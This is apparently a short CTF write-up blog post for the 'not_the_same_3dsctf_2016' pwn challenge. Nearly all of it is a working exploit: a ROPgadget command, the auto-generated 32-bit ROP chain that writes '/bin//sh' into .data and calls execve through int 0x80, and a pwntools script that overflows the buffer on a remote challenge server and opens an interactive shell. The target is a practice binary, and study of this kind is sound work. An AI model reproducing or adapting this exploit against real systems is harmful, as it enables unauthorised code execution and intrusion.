ROPgadget-not_the_same_3dsctf_2016

Posted by Mr.Be1ieVe on Tuesday, January 14, 2020

image-20200113223607640

image-20200113222600352

ROPgadget --binary not_the_same_3dsctf_2016 --ropchain

自动生成

from struct import pack
p = ''
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481ad) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fcf1) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080eb060) # padding without overwrite ebx
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0806d8a5) # int 0x80

加上自己算的偏移

from pwn import *
from struct import pack
elf = ELF("./not_the_same_3dsctf_2016")
#sh = process("./not_the_same_3dsctf_2016")
sh = remote("node3.buuoj.cn",26066)
context.log_level = "debug"
context.arch = "i386"
p = cyclic(0x2D)
p += ''
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481ad) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fcf1) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080eb060) # padding without overwrite ebx
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0807b2af) # inc eax ; ret
p += pack('<I', 0x0806d8a5) # int 0x80
sh.sendline(p)
sh.interactive()

「真诚赞赏,手留余香」

Mr.Be1ieVe's Treasure

真诚赞赏,手留余香

使用微信扫描二维码完成支付